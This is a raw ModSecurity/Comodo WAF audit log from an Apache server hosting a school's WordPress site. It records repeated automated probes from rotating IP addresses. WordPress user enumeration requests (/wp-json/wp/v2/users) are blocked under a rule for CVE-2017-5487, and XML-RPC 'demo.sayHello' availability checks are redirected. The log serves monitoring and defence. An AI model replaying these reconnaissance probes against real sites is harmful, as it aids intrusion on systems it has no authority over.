--96965d0a-Z-- --8de4c103-A-- [05/May/2025:22:41:55 +0700] aBjcQ_ZJDMuQndL03JNW7gAAAE8 103.236.140.4 58292 103.236.140.4 8181 --8de4c103-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8de4c103-C-- demo.sayHello --8de4c103-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8de4c103-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459715807268 5602 (- - -) Stopwatch2: 1746459715807268 5602; combined=4108, p1=486, p2=3398, p3=35, p4=33, p5=92, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8de4c103-Z-- --2278d44c-A-- [05/May/2025:22:43:44 +0700] aBjcsIZWvR7-42f6JrAIUgAAAMw 103.236.140.4 59284 103.236.140.4 8181 --2278d44c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2278d44c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2278d44c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459824784174 2348 (- - -) Stopwatch2: 1746459824784174 2348; combined=1206, p1=400, p2=765, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2278d44c-Z-- --2f1d2c48-A-- [05/May/2025:22:43:47 +0700] aBjcs4ZWvR7-42f6JrAIVQAAANI 103.236.140.4 59308 103.236.140.4 8181 --2f1d2c48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f1d2c48-C-- demo.sayHello --2f1d2c48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f1d2c48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459827525649 6922 (- - -) Stopwatch2: 1746459827525649 6922; combined=4999, p1=666, p2=4034, p3=38, p4=43, p5=124, sr=125, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f1d2c48-Z-- --f106e04a-A-- [05/May/2025:22:45:15 +0700] aBjdCwRwKNFSM6B7_Lac9AAAAIU 103.236.140.4 33444 103.236.140.4 8181 --f106e04a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f106e04a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f106e04a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459915983784 2218 (- - -) Stopwatch2: 1746459915983784 2218; combined=939, p1=321, p2=596, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f106e04a-Z-- --946a5c04-A-- [05/May/2025:22:45:18 +0700] aBjdDgRwKNFSM6B7_LadAAAAAI4 103.236.140.4 33586 103.236.140.4 8181 --946a5c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --946a5c04-C-- demo.sayHello --946a5c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --946a5c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459918825295 4755 (- - -) Stopwatch2: 1746459918825295 4755; combined=3286, p1=410, p2=2683, p3=26, p4=28, p5=80, sr=55, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --946a5c04-Z-- --2659086c-A-- [05/May/2025:22:46:10 +0700] aBjdQgRwKNFSM6B7_LaeDAAAAIE 103.236.140.4 35798 103.236.140.4 8181 --2659086c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2659086c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2659086c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459970767718 2803 (- - -) Stopwatch2: 1746459970767718 2803; combined=1275, p1=420, p2=817, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2659086c-Z-- --885f2f21-A-- [05/May/2025:22:46:14 +0700] aBjdRgRwKNFSM6B7_LaeDgAAAIA 103.236.140.4 35830 103.236.140.4 8181 --885f2f21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --885f2f21-C-- demo.sayHello --885f2f21-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --885f2f21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459974112671 5633 (- - -) Stopwatch2: 1746459974112671 5633; combined=4164, p1=531, p2=3395, p3=32, p4=34, p5=101, sr=76, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --885f2f21-Z-- --fb7d202f-A-- [05/May/2025:22:46:18 +0700] aBjdSvZJDMuQndL03JNZoAAAAEg 103.236.140.4 35866 103.236.140.4 8181 --fb7d202f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fb7d202f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb7d202f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459978004479 2285 (- - -) Stopwatch2: 1746459978004479 2285; combined=1198, p1=386, p2=777, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb7d202f-Z-- --b611367f-A-- [05/May/2025:22:46:20 +0700] aBjdTPZJDMuQndL03JNZogAAAEc 103.236.140.4 35894 103.236.140.4 8181 --b611367f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b611367f-C-- demo.sayHello --b611367f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b611367f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459980730073 6097 (- - -) Stopwatch2: 1746459980730073 6097; combined=4559, p1=569, p2=3755, p3=31, p4=35, p5=99, sr=80, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b611367f-Z-- --06335647-A-- [05/May/2025:22:46:27 +0700] aBjdU02V_h1VFAgsfgZ6MgAAABE 103.236.140.4 35942 103.236.140.4 8181 --06335647-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --06335647-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06335647-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459987098110 2708 (- - -) Stopwatch2: 1746459987098110 2708; combined=1241, p1=473, p2=739, p3=0, p4=0, p5=29, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06335647-Z-- --6371a968-A-- [05/May/2025:22:46:29 +0700] aBjdVQRwKNFSM6B7_LaeHwAAAJU 103.236.140.4 35958 103.236.140.4 8181 --6371a968-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6371a968-C-- demo.sayHello --6371a968-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6371a968-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459989882375 5375 (- - -) Stopwatch2: 1746459989882375 5375; combined=4196, p1=496, p2=3465, p3=32, p4=36, p5=101, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6371a968-Z-- --fc38fe03-A-- [05/May/2025:22:46:46 +0700] aBjdZvZJDMuQndL03JNZrgAAAEQ 103.236.140.4 36102 103.236.140.4 8181 --fc38fe03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc38fe03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc38fe03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460006697950 15850 (- - -) Stopwatch2: 1746460006697950 15850; combined=27239, p1=469, p2=806, p3=0, p4=0, p5=12996, sr=132, sw=0, l=0, gc=12968 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc38fe03-Z-- --7e84c03c-A-- [05/May/2025:22:46:48 +0700] aBjdaPZJDMuQndL03JNZsgAAAEs 103.236.140.4 36120 103.236.140.4 8181 --7e84c03c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e84c03c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e84c03c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460008323021 2901 (- - -) Stopwatch2: 1746460008323021 2901; combined=1275, p1=420, p2=821, p3=0, p4=0, p5=34, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e84c03c-Z-- --db301049-A-- [05/May/2025:22:46:48 +0700] aBjdaIZWvR7-42f6JrAKtAAAAMU 103.236.140.4 36128 103.236.140.4 8181 --db301049-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --db301049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db301049-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460008747556 2994 (- - -) Stopwatch2: 1746460008747556 2994; combined=1360, p1=407, p2=921, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db301049-Z-- --8c8f7774-A-- [05/May/2025:22:46:50 +0700] aBjdavZJDMuQndL03JNZuQAAAEE 103.236.140.4 36148 103.236.140.4 8181 --8c8f7774-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c8f7774-C-- demo.sayHello --8c8f7774-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c8f7774-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460010084187 4951 (- - -) Stopwatch2: 1746460010084187 4951; combined=3886, p1=471, p2=3209, p3=24, p4=28, p5=90, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c8f7774-Z-- --1e89e75e-A-- [05/May/2025:22:46:51 +0700] aBjda_ZJDMuQndL03JNZvQAAAEQ 103.236.140.4 36160 103.236.140.4 8181 --1e89e75e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e89e75e-C-- demo.sayHello --1e89e75e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e89e75e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460011289350 5423 (- - -) Stopwatch2: 1746460011289350 5423; combined=3891, p1=481, p2=3205, p3=26, p4=30, p5=87, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e89e75e-Z-- --2755e669-A-- [05/May/2025:22:46:51 +0700] aBjda_ZJDMuQndL03JNZvwAAAE0 103.236.140.4 36164 103.236.140.4 8181 --2755e669-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2755e669-C-- demo.sayHello --2755e669-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2755e669-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460011547523 4722 (- - -) Stopwatch2: 1746460011547523 